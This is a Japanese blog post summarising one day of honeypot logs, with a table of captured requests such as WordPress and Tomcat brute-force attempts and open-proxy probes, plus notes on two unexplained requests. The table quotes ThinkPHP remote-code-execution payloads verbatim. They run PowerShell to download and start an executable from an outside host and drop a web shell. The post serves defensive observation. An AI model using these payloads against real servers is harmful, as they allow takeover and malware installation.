WOWHoneypot観察(14日目)
2019/03/30(土)
トータルは1817件でした。
昨日より優しい。
| 件数 | 概要 | リクエスト |
|---|---|---|
| 449 | WordPressの調査 | POST /wp-login.php |
| 449 | WordPressのブルートフォース攻撃 | GET /wp-login.php |
| 446 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /xmlrpc.php |
| 391 | Tomcat管理ページへ対するブルートフォース攻撃 | GET /manager/html |
| 48 | アクセス | GET / |
| 1 | 第三者中継攻撃 | GET http[:]//www.ip.cn/ |
| 1 | 第三者中継攻撃 | GET http[:]//www.baidu.com/?rands=_5652281164324840809120 |
| 1 | 第三者中継攻撃 | GET http[:]//www.baidu.com/?rands=_164429264410929121660960 |
| 1 | 第三者中継攻撃 | GET http[:]//www.123cha.com/ |
| 1 | 第三者中継攻撃 | GET http[:]//www.123cha.com |
| 1 | 第三者中継攻撃 | GET http[:]//api.ipify.org/ |
| 1 | 第三者中継攻撃 | GET http[:]//157.52.156.49:42788/vs.php?rands=_54563491281844691727800 |
| 1 | 第三者中継攻撃 | GET http[:]//157.52.156.49:42788/vs.php?rands=_144660032010586882376240 |
| 1 | 第三者中継攻撃 | GET http[:]//104.148.42.211:42788/gvs.php?rands=_1553459910413848123488496 |
| 1 | 第三者中継攻撃 | GET http[:]//104.148.42.211:42788/gvs.php?rands=_1294551740810910642537088 |
| 1 | WordPressの調査 | GET /vlog/wp-login.php |
| 1 | WordPressの調査 | GET /vlog//wp-json/wp/v2/users/ |
| 1 | WordPressの調査 | GET /vlog//?author=1 |
| 1 | WordPressの調査 | GET /shop/wp-login.php |
| 1 | WordPressの調査 | GET /shop//wp-json/wp/v2/users/ |
| 1 | WordPressの調査 | GET /shop//?author=1 |
| 1 | 不明(調査?) | GET /script |
| 1 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid.hognoob.se/download.exe','C:/Windows/temp/qlhgfagbnvqfdyu25575.exe');start%20C:/Windows/temp/qlhgfagbnvqfdyu25575.exe |
| 1 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php |
| 1 | ThinkPHPの脆弱性を突いた攻撃 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http[:]//fid.hognoob.se/download.exe','C:/Windows/temp/qlhgfagbnvqfdyu25575.exe');start%20C:/Windows/temp/qlhgfagbnvqfdyu25575.exe |
| 1 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
| 1 | 不明(第三者中継攻撃の調査?) | GET /legal-notice/ |
| 1 | WordPressの調査 | GET /forum/wp-login.php |
| 1 | WordPressの調査 | GET /forum//wp-json/wp/v2/users/ |
| 1 | WordPressの調査 | GET /forum//?author=1 |
| 1 | WordPressの調査 | GET /blog/wp-login.php |
| 1 | WordPressの調査 | GET /blog//wp-json/wp/v2/users/ |
| 1 | WordPressの調査 | GET /blog//?author=1 |
| 1 | FreePBXの調査 | GET /admin/assets/js/views/login.js |
| 1 | 第三者中継攻撃 | CONNECT www.baidu.com:443 |
| 1 | 第三者中継攻撃 | CONNECT www.baidu.com |
| 1 | 第三者中継攻撃 | CONNECT cn.bing.com:443 |
1件不明なものがありました。
GET /script HTTP/1.1
Host: ***.***.***.***:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.13rc1 Windows/7
こちらはSec-Owlさんのハニーポットでも過去に観測していたみたいですね。
User-Agentがpythonで1IPから1件という部分まで共通していました。
sec-owl.hatenablog.com
これも謎です。。。
1IPから1件の通信でした。
第三者中継攻撃の調査なんですかね。。?
よくわからなかったのでわかる方いたら教えていただきたいです。
GET /legal-notice/ HTTP/1.1
Host: www.payback-ltd.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
にほんブログ村